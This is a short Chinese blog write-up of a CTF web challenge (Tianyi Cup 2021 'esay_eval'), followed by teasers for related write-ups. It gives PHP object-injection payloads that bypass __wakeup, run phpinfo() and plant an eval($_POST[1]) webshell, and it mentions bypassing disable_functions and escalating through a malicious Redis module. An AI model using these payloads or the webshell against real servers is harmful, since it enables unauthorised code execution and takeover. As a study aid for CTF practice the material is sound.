[天翼杯 2021]esay_eval

最新推荐文章于 2024-08-19 23:40:47 发布

ha0cker

最新推荐文章于 2024-08-19 23:40:47 发布

阅读量123

点赞数

文章标签： web安全安全 php

本文链接：https://blog.youkuaiyun.com/m0_70819573/article/details/129431817

版权

1.打开环境，审计代码。

思路是先建一个类B，调用__destruct,使a为A类，调用__call魔术方法。

_call//在类中调用不存在时调用此函数。

再者是_wake up的绕过，这里有intval函数(返回数据整数部分)的过滤，所以考虑添加真实属性的个数来绕过。

payload:

?poc=O:1:"B":1:{s:1:"a";O:1:"A":1:{s:4:"code";s:10:"phpinfo();";}s:1:"n":N;}

查看phpinfo发现函数禁用了system函数，无法用命令getshell,所以考虑用eval函数，先用蚁剑连接，再用饶过disabled_func的插件绕过。

payload:

?poc=O:1:%22B%22:1:{s:1:%22a%22;O:1:%22A%22:1:{s:4:%22code%22;s:16:%22eval($_POST[1]);%22;}s:1:%22n%22:N;}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ha0cker

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[天翼杯 2021]esay_eval - RCE(disabled_function绕过||AS_Redis绕过)+反序列化(大小写&wakeup绕过)

oZuoShen123的博客

10-09

928

1、看代码，有unserialize函数，说明要反序列化 2、有 eval($this->code) ，说明要RCE 3、有preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);，说明要绕过waf 4、A的wakeup里面会把code置空，所以要绕过起点：B（destruct）　　终点：A（call）链条：B（destruct::a=$a）-> A（call::code=命令）

天翼杯easy_eval复现

weixin_44687621的博客

09-25

1571

最近打了很多比赛，很多题没有做出来。所以决定复现一下某些题目。本地环境的搭建本地环境涉及到php的web服务、redis数据库。 Dockerfile的编写 FROM ubuntu:16.04 COPY src/sources.list /etc/apt/sources.list COPY src/redis-4.0.9 /home/redis-4.0.9 RUN apt-get update && \ apt-get install -y curl \

参与评论您还未登录，请先登录后发表或查看评论

ESAY_RE之没有main函数怎么办

gonna2011的博客

03-18

287

解题过程直接看大佬的https://blog.youkuaiyun.com/njh18790816639/article/details/112291179?spm=1001.2014.3001.5501 但是遇到这种没有主函数的题该怎么快速筛选出主要函数？？？和之前的Mysterious（攻防世界进阶区第一题）差不多，我遇到这种情况一般都是一个一个往下找的，但是这个题我get到一个奇怪的方法，先打开一下这个可执行文件是下面这个样子的：显示了input，说明input必在主函数中两键shift+F12，找到主要内容

UR3机械臂使用kinect2相机利用easy_hand手眼标定

SpengTAN的博客

05-15

3091

１.下载easy_handeye(标定的工具包) https://github.com/IFL-CAMP/easy_handeye 2.下载vision_visp(标定过程调用) https://github.com/lagadic/vision_visp 下载aruco_ros(标定过程调用) https://github.com/pal-robotics/aruco_ros 进入/cat...

Reversing.Kr中Easy Crack和EasyKeygen

s0il的博客

10-09

460

Easy Crack：丢进od之后感觉不是很清晰，就放进ida中在偏移.text:00401020中找到核心函数，找到if字段分析后得到 flag是：Ea5yR3versing EasyKeygen：丢进ida中找到main函数： F5后的类C代码：看到两个输入的我表示摸不着头脑，看看别人的writeup：发现我忽略了文件夹中还有一个readme.text: 直接指明了s...

2021 天翼杯easy_eval

m0_56059226的博客

10-04

2430

打开环境 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a-&gt

[天翼杯 2021]esay_eval（复现）

qq_53460654的博客

12-17

3140

<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a->a();

[天翼杯 2021]esay_eval WP

wikey 的博客

03-31

1630

得到了payload：?}}直接不犹豫连接蚁剑.当我们以为就此结束可以拿到flag我们点击根目录发现这个shell没有访问权限，但是在/var/www/html中有上传权限，所以可以通过上传恶意的so文件，通过蚁剑的redis管理插件，进行ssrf，然后包含恶意so文件（：因为插件市场这个东西，国内基本是访问不到，我在用蚁剑访问的时候，就一直转圈圈转不出来，所以可以使用github的插件仓库下载插件，然后手动放到。

[天翼杯 2021]esay_eval-----记Redis提权

qq_73767109的博客

06-25

296

一旦攻击者获得了访问权限，他们就可以上传 exp.so 文件到 Redis 服务器中，并使用 Redis 的 module load 命令加载这个文件。exp.so 文件是一个 Redis 模块，它提供了一些命令和功能，可以让攻击者在 Redis 服务器中执行任意代码，从而获得服务器的控制权。Vim缓存泄露指的是当用户在Vim编辑器中打开了一个文件，并进行了修改，然后使用了Vim或其他工具关闭了该文件，但Vim缓存中仍然保留着该文件的副本，从而导致该文件中的敏感信息（例如密码、私密密钥等）泄露的漏洞。

『CTF Web复现』[2021 天翼杯]easy_eval

Ho1aAs‘s Blog

09-23

1281

文章目录利用点源码过程分析反序列化绕过wakeupRedis加载恶意so获取shell完利用点反序列化绕过wakeup Redis加载恶意so获取shell 源码 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code

[天翼杯 2021]esay_eval复现